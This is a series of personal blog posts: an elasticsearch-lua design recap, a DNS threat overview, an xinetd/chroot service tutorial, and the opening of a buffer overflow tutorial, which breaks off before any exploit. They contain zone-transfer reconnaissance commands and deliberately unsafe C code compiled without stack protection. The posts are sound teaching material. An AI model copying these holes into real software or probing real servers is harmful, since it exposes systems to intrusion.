<h3 id="influenced-by-other-official-clients">Influenced by other official clients</h3>
<p>Much of the client was influenced by the official clients, mainly <a href="https://github.com/elastic/elasticsearch-php">elasticsearch-php</a>, <a href="https://github.com/elastic/elasticsearch-js">elasticsearch-js</a>, and <a href="https://github.com/elastic/elasticsearch-py">elasticsearch-py</a>. Before even starting with the design of the client I went through the architecture of these clients to get acquainted with the feature set they provide and the conventions they follow. My reason for doing so was to basically prevent ‘reinventing the wheel’ while stable and widely used clients were already present. Also providing the same kind of conventions would help any user, who has already used these other clients, to feel at home while working with the client. This is evident from the below example in which both codes look quite similar. The same applies to most functions as well.</p>
<blockquote>
<h4 id="using-the-javascript-client-to-get-a-document">Using the Javascript client to get a document</h4>
</blockquote>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kd">var</span> <span class="nx">elasticsearch</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'elasticsearch'</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">client</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">elasticsearch</span><span class="p">.</span><span class="nx">Client</span><span class="p">({</span>
<span class="na">host</span><span class="p">:</span> <span class="s1">'localhost:9200'</span><span class="p">,</span>
<span class="na">log</span><span class="p">:</span> <span class="s1">'trace'</span>
<span class="p">});</span>
<span class="nx">client</span><span class="p">.</span><span class="kd">get</span><span class="p">({</span>
<span class="na">index</span><span class="p">:</span> <span class="s1">'my_index'</span><span class="p">,</span>
<span class="na">type</span><span class="p">:</span> <span class="s1">'my_type'</span><span class="p">,</span>
<span class="na">id</span><span class="p">:</span> <span class="s1">'my_dox'</span>
<span class="p">},</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">error</span><span class="p">,</span> <span class="nx">response</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// ...</span>
<span class="p">});</span>
</code></pre></div></div>
<blockquote>
<h4 id="using-the-lua-client-to-get-a-document">Using the Lua client to get a document</h4>
</blockquote>
<div class="language-lua highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kd">local</span> <span class="n">elasticsearch</span> <span class="o">=</span> <span class="nb">require</span> <span class="s2">"elasticsearch"</span>
<span class="kd">local</span> <span class="n">client</span> <span class="o">=</span> <span class="n">elasticsearch</span><span class="p">.</span><span class="n">client</span><span class="p">{</span>
<span class="n">hosts</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">{</span> <span class="n">host</span> <span class="o">=</span> <span class="s2">"localhost"</span><span class="p">,</span>
<span class="n">port</span> <span class="o">=</span> <span class="mi">9200</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kd">local</span> <span class="n">data</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">client</span><span class="p">:</span><span class="n">get</span><span class="p">{</span>
<span class="n">index</span> <span class="o">=</span> <span class="s2">"my_index"</span><span class="p">,</span>
<span class="nb">type</span> <span class="o">=</span> <span class="s2">"my_type"</span><span class="p">,</span>
<span class="n">id</span> <span class="o">=</span> <span class="s2">"my_doc"</span>
<span class="p">}</span>
</code></pre></div></div>
<h3 id="using-object-oriented-programming">Using Object Oriented Programming</h3>
<p>Although Lua does not provide any special construct for declaring objects and classes, I preferred going with object oriented approach mostly because I was used to it. <strong>Lua has only the concept of tables.</strong> To create an object model over the Lua table, I followed the <a href="http://www.lua.org/pil/16.html">approach suggested by the language author</a>.</p>
<h3 id="logging">Logging</h3>
<p>I looked into <a href="http://logging.apache.org/log4j/2.x/">log4j</a> while including logging in the client. Log levels defined in the client are same as compared with log levels in log4j. The user can specify the log levels while creating the client object.</p>
<h3 id="lua-specific-constructs">Lua specific constructs</h3>
<p>Instead of throwing errors using <code class="highlighter-rouge">error()</code> function, I kept on with the Lua convention of returning <code class="highlighter-rouge">nil, error</code>. This enables the user to systematically handle errors as and when required. Also, there is a conceptual difference between ‘Application Error’ and ‘Request Error’.</p>
<p>Lua has the concept of passing parameters by reference. Hence, sometimes I maintained a copy of variables to work on instead of directly changing the passed parameters.</p>
<h3 id="parameter-checking-while-requesting-endpoints">Parameter checking while requesting endpoints</h3>
<p>Every request to an endpoint in elasticsearch is associated with various parameters that are passed in the HTTP request. Every kind of endpoint has a list of allowed parameters. I discussed with my mentor regarding the possibility of checking user parameters before sending a request. In the end I decided to to implement parameter checking because of the following reasons:</p>
<ol>
<li>The user should focus more on his application rather than elasticsearch.</li>
<li>The user should be notified of invalid parameters as it saves time in debugging his/her own code.</li>
<li>Not much overhead is required to check the parameters passed by the user.</li>
<li>Sending invalid requests will only put unnecessary load on the server and be time-consuming for the client.</li>
</ol>
<p>Overall it’s been a wonderful experience developing elasticsearch-lua and working for Google Summer of Code. It was a great learning for me. I shall continue developing it further. Feel free to contribute!</p>
DNS Security2015-09-08T00:00:00+00:00https://dhavalkapil.com/blogs/DNS-Security<blockquote>
<h2 id="introduction">Introduction</h2>
</blockquote>
<p>The Domain Name System is an essential component of the functionality of most Internet services. It provides a distributed solution for services such as resolving host names to IP addresses and vice versa. DNS was designed around the early 1980s without any security consideration. This was mainly because at that time networks were quite small. All the hosts in the network were known beforehand and trustworthy. There was no need for authenticity.</p>
<p>But as the network grew and Internet was born DNS remained unchanged. This resulted in lots of threats that target DNS due to the lack of authenticity and integrity checking of data held within the DNS. In 1994, the Internet Engineering Task Force (IETF) started working to add security extensions known as Domain Name System Security Extensions (DNSSEC) to the existing DNS protocol. Unfortunately, these extensions are still far from being adopted.</p>
<p>A discussion on each of these topics is presented in this blog.</p>
<blockquote>
<h2 id="about-dns">About DNS</h2>
</blockquote>
<p>As per <a href="https://en.wikipedia.org/wiki/Domain_Name_System">wikipedia</a></p>
<blockquote>
<p>The Domain Name System (DNS) is a hierarchical distributed naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities. Most prominently, it translates domain names, which can be easily memorized by humans, to the numerical IP addresses needed for the purpose of computer services and devices worldwide.</p>
</blockquote>
<p><img src="/assets/images/DNS-Security/dns_about.png" alt="DNS about" /></p>
<p><em>Image Source: <a href="http://www.codeguru.com/cpp/sample_chapter/article.php/c12013/Sample-Chapter-Domain-Name-System.htm">here</a></em></p>
<p>DNS is like a phone book for the Internet. One can’t remember each and every IP for the websites that he or she visits. It’s much easier to remember the domain names instead.</p>
<blockquote>
<h2 id="threats-involving-dns">Threats involving DNS</h2>
</blockquote>
<ol>
<li>Zone File Compromise</li>
<li>Zone Information Leakage/DNS Footprinting</li>
<li>DNS Amplification Attack</li>
<li>DNS Client flooding</li>
<li>DNS Cache poisoning</li>
<li>DNS Vulnerabilities in Shared Host Environments</li>
<li>DNS Man in the Middle Attacks - DNS Hijacking</li>
<li>Typosquatting</li>
</ol>
<blockquote>
<h3 id="zone-file-compromise">Zone File Compromise</h3>
</blockquote>
<p>The DNS server is hosted on a number of machines. The administrator can configure the DNS server including the DNS records using either command line interface or a GUI interface provided by the DNS server.</p>
<p>In a Zone File Compromise attack, the attacker attacks the DNS server by gaining direct access to these machines. He/she can be in physical contact with the server or connected through an SSH/RDP connection.</p>
<p><strong>Security measures</strong>: Restrict access to the DNS server, both physically and remotely.</p>
<blockquote>
<h3 id="zone-information-leakagedns-footprinting">Zone Information Leakage/DNS Footprinting</h3>
</blockquote>
<p><em>DNS Zone Transfer</em> involves a DNS server passing a copy of part of its database(called “zone”) to another DNS server. Zone transfer is used when we need to have more than one DNS server answering queries for a particular zone. There is a Master DNS Server and some Slave DNS Servers. A Slave DNS Server asks for zone transfer from the Master DNS Server.</p>
<p>The attacker just pretends to be a Slave DNS Server and asks the Master DNS Server for a copy of the records. These records reveal a lot about the topology of the internal network.
Steps for performing Zone Transfer(on a UNIX machine):</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dig NS 'domain' +short
</code></pre></div></div>
<p>Displays the authoritative name servers for that domain</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dig AXFR 'domain' @'nameserver'
</code></pre></div></div>
<p>Retrieves all the DNS records from a particular nameserver</p>
<p><strong>Security measures</strong>: Restrict zone transfers to particular IP addresses or use any other kind of authentication.</p>
<blockquote>
<h3 id="dns-amplification-attack">DNS Amplification Attack</h3>
</blockquote>
<p>This type of attack is used to perform DOS attack on a victim host using genuine DNS servers.
It involves sending DNS packets to a DNS server, spoofed with source IP as the victim IP. The DNS server responds back with much larger DNS responses that go to the victim host.</p>
<blockquote>
<h3 id="dns-client-flooding">DNS Client Flooding</h3>
</blockquote>
<p>DNS Client Flooding aims at sending a flood of UDP requests to the DNS server to exhaust its resources. A common technique is to send DNS request packets for an invalid domain. The DNS server spends its resources to look for this domain. After a certain limit, it has no resources to serve legitimate requests.</p>
<blockquote>
<h3 id="dns-cache-poisoning">DNS Cache poisoning</h3>
</blockquote>
<p>A client queries its configured DNS server for resolving a domain name. This DNS server queries other DNS servers for that domain name and after getting a result, caches it, till the corresponding TTL value. Until this TTL value, client queries for that particular domain name are retrieved from the cache instead of making further queries to other DNS servers for that domain.</p>
<p>This can be abused by an attacker to place false information in the local DNS server’s cache. The attacker needs to reply back to the configured DNS server with the malicious address before the actual reply comes back.</p>
<p><img src="/assets/images/DNS-Security/dns_cache_poisoning.png" alt="DNS cache poisonoing" /></p>
<p><em>Image Source: <a href="https://jfdm.host.cs.st-andrews.ac.uk/notes/netsec/">here</a></em></p>
<blockquote>
<h3 id="dns-vulnerabilities-in-shared-host-environments">DNS Vulnerabilities in Shared Host Environments</h3>
</blockquote>
<p>A shared host environment is where one DNS server is shared amongst many users and domains.</p>
<p>Free Services such as <code class="highlighter-rouge">cpanel</code> provide such facilities.</p>
<p>Say an attacker using a shared DNS server creates a zone file for <code class="highlighter-rouge">xyz.com</code> domain and adds relevant <code class="highlighter-rouge">A</code> and <code class="highlighter-rouge">MX</code> records. Now any user who has the said DNS server configured as primary from a client will when attempting to go to <code class="highlighter-rouge">xyz.com</code> be directed to the records as configured by the client i.e. potentially false information.</p>
<p><img src="/assets/images/DNS-Security/dns_shared_host_vulnerability.png" alt="DNS shared host vulnerability" /></p>
<p><em>Image Source: <a href="http://www.net-security.org/dl/articles/Attacking_the_DNS_Protocol.pdf">here</a></em></p>
<blockquote>
<h3 id="dns-man-in-the-middle-attacks---dns-hijacking">DNS Man in the Middle Attacks - DNS Hijacking</h3>
</blockquote>
<p>An attacker can intercept the name resolution queries sent by the client to a DNS server. He/she can send back incorrect replies back to the client. This type of attack is very much a race condition, in that the attacker needs to get his reply back to the client before the legitimate server does. The client shall only look at the first response it gets and there is no way it can differentiate between the attacker or its DNS server.</p>
<p><img src="/assets/images/DNS-Security/dns_mitm.png" alt="DNS Man in the Middle attack" /></p>
<p><em>Image Source: <a href="http://www.net-security.org/dl/articles/Attacking_the_DNS_Protocol.pdf">here</a></em></p>
<blockquote>
<h3 id="typosquatting">Typosquatting</h3>
</blockquote>
<p>Definition from <a href="https://en.wikipedia.org/wiki/Typosquatting">wikipedia</a>:</p>
<blockquote>
<p>Typosquatting, also called URL hijacking, sting site, or fake URL, is a form of cybersquatting, and possibly brandjacking which relies on mistakes such as typographical errors made by Internet users when inputting a website address into a web browser. Should a user accidentally enter an incorrect website address, they may be led to any URL (including an alternative website owned by a cybersquatter).</p>
</blockquote>
<p>The attacker registers similar sounding domain names. This threat does not target a particular victim.</p>
<blockquote>
<h2 id="dnssec-domain-name-system-security-extensions">DNSSEC (Domain Name System Security Extensions)</h2>
</blockquote>
<p>Around 1994, the IETF started a discussion to make DNS secure by adding a set of extensions to it. These extensions, labeled as Domain Name System Security Extensions (DNSSEC), were formally published in 2005. Unfortunately, even after around 10 years, DNSSEC is still not adopted even though its backward compatible. Mostly because network operatives prefer stability over complexity.</p>
<p>Backward compatibility was enforced by using the RR (Resource Record) construct of the DNS that was purposely designed to be extensible. A new set of RRs was defined that holds the security information. While designing DNSSEC, performance issues were kept in mind.</p>
<p>In all DNSSEC provides authentication and integrity to the DNS. This helps in preventing many attacks. Cache poisoning and Client flooding attacks are prevented with the addition of source authentication. Even Zone File Compromise attack is mitigated. Note however that DNSSEC does not provide any security against information leakage.</p>
<p><strong>Note</strong>: I recently did a talk about DNS Security in my college. Slides can be found <a href="https://speakerdeck.com/dhavalkapil/dns-security">here</a>.</p>
<p><strong>Edit</strong>: Lately there has been work on minimizing information leakage. <a href="http://w3.antd.nist.gov/pubs/892-papers/WorkingPapers-WERB-approved/DNS-information-leakage-Rose-Nakassis.pdf">This</a> is a good resource. Thanks to <a href="https://captnemo.in/">captnemo</a> for pointing this out.</p>
Combining chroot and xinetd2015-05-04T00:00:00+00:00https://dhavalkapil.com/blogs/Combining-chroot-and-xinetd<blockquote>
<h2 id="introduction">Introduction</h2>
</blockquote>
<p>In this blog we will talk about running network applications securely. A simple program(that takes I/O from the console) can be run as a secure service using a combination of <code class="highlighter-rouge">xinetd</code> and <code class="highlighter-rouge">chroot</code>. I used this technique while developing challenges for <a href="https://backdoor.sdslabs.co/">Backdoor</a>. The <a href="https://backdoor.sdslabs.co/challenges/ECHO">ECHO</a> challenge is a good example.</p>
<p>Key points:</p>
<ol>
<li>The program running in the background takes I/O directly from the console.</li>
<li><code class="highlighter-rouge">xinetd</code> handles all the network related requests.</li>
<li>The program is run in a jail directory using <code class="highlighter-rouge">chroot</code> with restricted access to directory structure.</li>
</ol>
<p>I will give a simple walkthrough but first I expect the reader to be familiar with the following:</p>
<blockquote>
<h3 id="xinetd">xinetd</h3>
</blockquote>
<p>This is what <a href="http://en.wikipedia.org/wiki/Xinetd">wikipedia</a> says:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> xinetd listens for incoming requests over a network and launches the appropriate service for that request. Requests are made using port numbers as identifiers and xinetd usually launches another daemon to handle the request.
</code></pre></div></div>
<p>Instead of starting each server individually, <code class="highlighter-rouge">xinetd</code> is the only daemon process to be started. It listens for each and every service listed in its configuration and starts the appropriate service whenever a new request comes up.</p>
<blockquote>
<h3 id="chroot">chroot</h3>
</blockquote>
<p>Again from <a href="http://en.wikipedia.org/wiki/Chroot">wikipedia</a>:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> A chroot on Unix operating systems is an operation that changes the apparent root directory for the current running process and its children. A program that is run in such a modified environment cannot name (and therefore normally not access) files outside the designated directory tree. The modified environment is called a "chroot jail".
</code></pre></div></div>
<p>Setting up a <code class="highlighter-rouge">chroot</code> jail is easy though time consuming.</p>
<blockquote>
<h2 id="walkthrough---reader">Walkthrough - <code class="highlighter-rouge">reader</code></h2>
</blockquote>
<p>We’ll write a simple service to that takes the name of a file as the input and prints the first 1024 bytes of the file.</p>
<blockquote>
<h3 id="1-write-source-program-for-the-service">1. Write source program for the service</h3>
</blockquote>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
int main()
{ char file_name[50];
char buf[1025];
int fd;
printf("Enter filename:\n");
fflush(stdout);
scanf("%s", file_name);
fd = open(file_name, O_RDONLY);
if(fd==-1)
{ printf("Error: %d\n", errno);
return -1;
}
if(read(fd, buf, sizeof(buf))<0)
{ printf("Error: %d\n", errno);
close(fd);
return -1;
}
printf("%s\n", buf);
close(fd);
return 0;
}
</code></pre></div></div>
<p>Download it <a href="/assets/files/Combining-chroot-and-xinetd/source.c">here</a></p>
<blockquote>
<h3 id="2-creating-a-chroot-jail">2. Creating a chroot jail</h3>
</blockquote>
<p>First of all let’s compile our code and generate the binary.</p>
<blockquote>
<p>gcc reader.c -o reader</p>
</blockquote>
<p>As it will be jailed, we need to import all the libraries that our binary <code class="highlighter-rouge">reader</code> will require. For finding all the required libraries we will use <code class="highlighter-rouge">ldd</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> $ ldd reader
linux-vdso.so.1 => (0x00007ffc79702000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f4b13787000)
/lib64/ld-linux-x86-64.so.2 (0x00007f4b13b76000)
</code></pre></div></div>
<p>This is a sample output on my machine and it may vary for yours. So basically I copy the two libraries (libc.so.6 and ld-linux-x86-64.so.2) maintaining the same directory structure relative to my program. My directory structure now looks like this:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ./
|-- lib/
|-- |-- x86_64-linux-gnu/
|-- --- |-- libc.so.6
|-- lib64/
|-- |-- ld-linux-x86-64.so.2
|-- reader.c
|-- reader
</code></pre></div></div>
<p>To test that you have successfully created a jail try this:</p>
<blockquote>
<p>chroot . ./reader</p>
</blockquote>
<p>You won’t be able to view any file outside the reader’s directory. If you can then you did something wrong!</p>
<blockquote>
<h3 id="3-adding-a-configuration-file-in-xinetd-for-reader">3. Adding a configuration file in xinetd for <code class="highlighter-rouge">reader</code></h3>
</blockquote>
<p>First of all make sure that <code class="highlighter-rouge">/etc/xinetd.conf</code> contains the following line:</p>
<blockquote>
<p>includedir /etc/xinetd.d</p>
</blockquote>
<p>After that create a new configuration file <code class="highlighter-rouge">/etc/xinetd.d/reader</code></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> service reader
{
type = UNLISTED
protocol = tcp
socket_type = stream
port = 8001
wait = no
server = /usr/sbin/chroot
server_args = /home/vampire/reader/ ./reader
user = root
}
</code></pre></div></div>
<p>You can download the file <a href="/assets/files/Combining-chroot-and-xinetd/reader">here</a>.</p>
<p>Explanation:</p>
<ol>
<li>
<p>type = UNLISTED: Standard services are listed in <code class="highlighter-rouge">/etc/services</code>. Our service is not standard so we will also need to specify the <code class="highlighter-rouge">protocol</code> and <code class="highlighter-rouge">port</code>.</p>
</li>
<li>
<p>protocol = tcp: We shall use tcp protocol.</p>
</li>
<li>
<p>socket_type = stream: We will use connection oriented socket</p>
</li>
<li>
<p>port = 8001: The port number our service will listen to</p>
</li>
<li>
<p>wait = no: Our service is multithreaded. There can be more than one client connected to it at a time.</p>
</li>
<li>
<p>server = /usr/sbin/chroot: This is the <code class="highlighter-rouge">chroot</code> binary in my machine. You can find yours by executing <code class="highlighter-rouge">which chroot</code>.</p>
</li>
<li>
<p>server_args = /home/vampire/reader/ ./reader: These are the parameters passed to <code class="highlighter-rouge">chroot</code> command.</p>
</li>
<li>
<p>user = root: Only root users can run <code class="highlighter-rouge">chroot</code>.</p>
</li>
</ol>
<p>For complete list see the <a href="http://linux.die.net/man/5/xinetd.conf">man</a> page.</p>
<blockquote>
<h3 id="4-restart-the-xinetd-daemon">4. Restart the xinetd daemon</h3>
</blockquote>
<p>The <code class="highlighter-rouge">xinetd</code> daemon can be restarted using the following command:</p>
<blockquote>
<p>/etc/init.d/xinetd restart</p>
</blockquote>
<p><code class="highlighter-rouge">xinetd</code> logs in <code class="highlighter-rouge">/var/log/syslog</code> by default.</p>
<p>Hurray! We have successfully run our service securely. To test it run the following command:</p>
<blockquote>
<p>nc localhost 8001</p>
</blockquote>
<p>Change the IP/port accordingly. You should be able to run the program correctly. Also try giving different source file path names. You won’t be able to access any file other than one in <code class="highlighter-rouge">/home/vampire/reader/</code>. Also keep in mind to flush the buffer so that the text is displayed instantly.</p>
<p>Comments are welcome. If you know of a better way to do this, feel free to tell me!</p>
Buffer Overflow Exploit2015-04-03T00:00:00+00:00https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit<blockquote>
<h2 id="introduction">Introduction</h2>
</blockquote>
<p>I am interested in exploiting binary files. The first time I came across the <code class="highlighter-rouge">buffer overflow</code> exploit, I couldn’t actually implement it. Many of the existing sources on the web were outdated(worked with earlier versions of gcc, linux, etc). It took me quite a while to actually run a vulnerable program on my machine and exploit it.</p>
<p>I decided to write a simple tutorial for beginners or people who have just entered the field of binary exploits.</p>
<blockquote>
<h3 id="what-will-this-tutorial-cover">What will this tutorial cover?</h3>
</blockquote>
<p>This tutorial will be very basic. We will simply exploit the buffer by smashing the stack and modifying the return address of the function. This will be used to call some other function. You can also use the same technique to point the return address to some custom code that you have written, thereby executing anything you want(perhaps I will write another blog post regarding shellcode injection).</p>
<blockquote>
<h3 id="any-prerequisites">Any prerequisites?</h3>
</blockquote>
<ol>
<li>I assume people to have basic-intermediate knowledge of <code class="highlighter-rouge">C</code>.</li>
<li>They should be a little familiar with <code class="highlighter-rouge">gcc</code> and the linux command line.</li>
<li>Basic x86 assembly language.</li>
</ol>
<blockquote>
<h3 id="machine-requirements">Machine Requirements:</h3>
</blockquote>
<p>This tutorial is specifically written to work on the latest distro’s of <code class="highlighter-rouge">linux</code>. It might work on older versions. Similar is the case for <code class="highlighter-rouge">gcc</code>. We are going to create a 32 bit binary, so it will work on both 32 and 64 bit systems.</p>
<blockquote>
<h3 id="sample-vulnerable-program">Sample vulnerable program:</h3>
</blockquote>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <stdio.h>
</span>
<span class="kt">void</span> <span class="nf">secretFunction</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Congratulations!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"You have entered in the secret function!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">echo</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">char</span> <span class="n">buffer</span><span class="p">[</span><span class="mi">20</span><span class="p">];</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Enter some text:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">scanf</span><span class="p">(</span><span class="s">"%s"</span><span class="p">,</span> <span class="n">buffer</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"You entered: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">buffer</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">echo</span><span class="p">();</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Now this programs looks quite safe for the usual programmer. But in fact we can call the <code class="highlighter-rouge">secretFunction</code> by just modifying the input. There are better ways to do this if the binary is local. We can use <code class="highlighter-rouge">gdb</code> to modify the <code class="highlighter-rouge">%eip</code>. But in case the binary is running as a service on some other machine, we can make it call other functions or even custom code by just modifying the input.</p>
<blockquote>
<h2 id="memory-layout-of-a-c-program">Memory Layout of a C program</h2>
</blockquote>
<p>Let’s start by first examining the memory layout of a C program, especially the stack, it’s contents and it’s working during function calls and returns. We will also go into the machine registers <code class="highlighter-rouge">esp</code>, <code class="highlighter-rouge">ebp</code>, etc.</p>
<blockquote>
<h3 id="divisions-of-memory-for-a-running-process">Divisions of memory for a running process</h3>
</blockquote>
<p><img src="/assets/images/Buffer-Overflow-Exploit/memory_layout.png" alt="Memory layout of a C program" /></p>
<p><em>Source: <a href="http://i.stack.imgur.com/1Yz9K.gif">http://i.stack.imgur.com/1Yz9K.gif</a></em></p>
<ol>
<li>
<p><strong>Command line arguments and environment variables</strong>: The arguments passed to a program before running and the environment variables are stored in this section.</p>
</li>
<li>
<p><strong>Stack</strong>: This is the place where all the function parameters, return addresses and the local variables of the function are stored. It’s a <code class="highlighter-rouge">LIFO</code> structure. It grows downward in memory(from higher address space to lower address space) as new function calls are made. We will examine the stack in more detail later.</p>
</li>
<li>
<p><strong>Heap</strong>: All the dynamically allocated memory resides here. Whenever we use <code class="highlighter-rouge">malloc</code> to get memory dynamically, it is allocated from the heap. The heap grows upwards in memory(from lower to higher memory addresses) as more and more memory is required.</p>
</li>
<li>
<p><strong>Uninitialized data(Bss Segment)</strong>: All the uninitialized data is stored here. This consists of all global and static variables which are not initialized by the programmer. The kernel initializes them to arithmetic 0 by default.</p>
</li>
<li>
<p><strong>Initialized data(Data Segment)</strong>: All the initialized data is stored here. This constists of all global and static variables which are initialised by the programmer.</p>
</li>
<li>
<p><strong>Text</strong>: This is the section where the executable code is stored. The <code class="highlighter-rouge">loader</code> loads instructions from here and executes them. It is often read only.</p>
</li>
</ol>
<blockquote>
<h3 id="some-common-registers">Some common registers:</h3>
</blockquote>
<ol>
<li>
<p><strong>%eip</strong>: The <strong>Instruction pointer register</strong>. It stores the address of the next instruction to be executed. After every instruction execution it’s value is incremented depending upon the size of an instrution.</p>
</li>
<li>
<p><strong>%esp</strong>: The <strong>Stack pointer register</strong>. It stores the address of the top of the stack. This is the address of the last element on the stack. The stack grows downward in memory(from higher address values to lower address values). So the <code class="highlighter-rouge">%esp</code> points to the value in stack at the lowest memory address.</p>
</li>
<li>
<p><strong>%ebp</strong>: The <strong>Base pointer register</strong>. The <code class="highlighter-rouge">%ebp</code> register usually set to <code class="highlighter-rouge">%esp</code> at the start of the function. This is done to keep tab of function parameters and local variables. Local variables are accessed by subtracting offsets from <code class="highlighter-rouge">%ebp</code> and function parameters are accessed by adding offsets to it as you shall see in the next section.</p>
</li>
</ol>
<blockquote>
<h3 id="memory-management-during-function-calls">Memory management during function calls</h3>
</blockquote>
<p>Consider the following piece of code:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">func</span><span class="p">(</span><span class="kt">int</span> <span class="n">a</span><span class="p">,</span> <span class="kt">int</span> <span class="n">b</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">c</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">d</span><span class="p">;</span>
<span class="c1">// some code
</span><span class="p">}</span>
<span class="kt">void</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">func</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="c1">// next instruction
</span><span class="p">}</span>
</code></pre></div></div>
<p>Assume our <code class="highlighter-rouge">%eip</code> is pointing to the <code class="highlighter-rouge">func</code> call in <code class="highlighter-rouge">main</code>. The following steps would be taken:</p>
<ol>
<li>A function call is found, push parameters on the stack from right to left(in reverse order). So <code class="highlighter-rouge">2</code> will be pushed first and then <code class="highlighter-rouge">1</code>.</li>
<li>We need to know where to return after <code class="highlighter-rouge">func</code> is completed, so push the address of the next instruction on the stack.</li>
<li>Find the address of <code class="highlighter-rouge">func</code> and set <code class="highlighter-rouge">%eip</code> to that value. The control has been transferred to <code class="highlighter-rouge">func()</code>.</li>
<li>As we are in a new function we need to update <code class="highlighter-rouge">%ebp</code>. Before updating we save it on the stack so that we can return later back to <code class="highlighter-rouge">main</code>. So <code class="highlighter-rouge">%ebp</code> is pushed on the stack.</li>
<li>Set <code class="highlighter-rouge">%ebp</code> to be equal to <code class="highlighter-rouge">%esp</code>. <code class="highlighter-rouge">%ebp</code> now points to current stack pointer.</li>
<li>Push local variables onto the stack/reserver space for them on stack. <code class="highlighter-rouge">%esp</code> will be changed in this step.</li>
<li>After <code class="highlighter-rouge">func</code> gets over we need to reset the previous stack frame. So set <code class="highlighter-rouge">%esp</code> back to <code class="highlighter-rouge">%ebp</code>. Then pop the earlier <code class="highlighter-rouge">%ebp</code> from stack, store it back in <code class="highlighter-rouge">%ebp</code>. So the base pointer register points back to where it pointed in <code class="highlighter-rouge">main</code>.</li>
<li>Pop the return address from stack and set <code class="highlighter-rouge">%eip</code> to it. The control flow comes back to <code class="highlighter-rouge">main</code>, just after the <code class="highlighter-rouge">func</code> function call.</li>
</ol>
<p>This is how the stack would look while in <code class="highlighter-rouge">func</code>.</p>
<p><img src="/assets/images/Buffer-Overflow-Exploit/stack.png" alt="Stack layout during function call" /></p>
<blockquote>
<h2 id="buffer-overflow-vulnerability">Buffer overflow vulnerability</h2>
</blockquote>
<p>Buffer overflow is a vulnerability in low level codes of C and C++. An attacker can cause the program to crash, make data corrupt, steal some private information or run his/her own code.</p>
<p>It basically means to access any buffer outside of it’s alloted memory space. This happens quite frequently in the case of arrays. Now as the variables are stored together in stack/heap/etc. accessing any out of bound index can cause read/write of bytes of some other variable. Normally the program would crash, but we can skillfully make some vulnerable code to do any of the above mentioned attacks. Here we shall modify the return address and try to execute the return address.</p>
<p><a href="/assets/files/Buffer-Overflow-Exploit/vuln.c">Here</a> is the link to the above mentioned code. Let’s compile it.</p>
<blockquote>
<p><em>For 32 bit systems</em></p>
</blockquote>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc vuln.c -o vuln -fno-stack-protector
</code></pre></div></div>
<blockquote>
<p><em>For 64 bit systems</em></p>
</blockquote>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc vuln.c -o vuln -fno-stack-protector -m32
</code></pre></div></div>
<p><code class="highlighter-rouge">-fno-stack-protector</code> disabled the stack protection. Smashing the stack is now allowed. <code class="highlighter-rouge">-m32</code> made sure that the compiled binary is 32 bit. You may need to install some additional libraries to compile 32 bit binaries on 64 bit machines. You can download the binary generated on my machine <a href="/assets/files/Buffer-Overflow-Exploit/vuln">here</a>.</p>
<p>You can now run it using <code class="highlighter-rouge">./vuln</code>.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Enter some text:
HackIt!
You entered: HackIt!
</code></pre></div></div>
<p>Let’s begin to exploit the binary. First of all we would like to see the disassembly of the binary. For that we’ll use <code class="highlighter-rouge">objdump</code></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>objdump -d vuln
</code></pre></div></div>
<p>Running this we would get the entire disasembly. Let’s focus on the parts that we are interested in. (Note however that your output may vary)</p>
<p><img src="/assets/images/Buffer-Overflow-Exploit/disassembly.png" alt="Disassembly of vuln binary" /></p>
<blockquote>
<h3 id="inferences">Inferences:</h3>
</blockquote>
<ol>
<li>
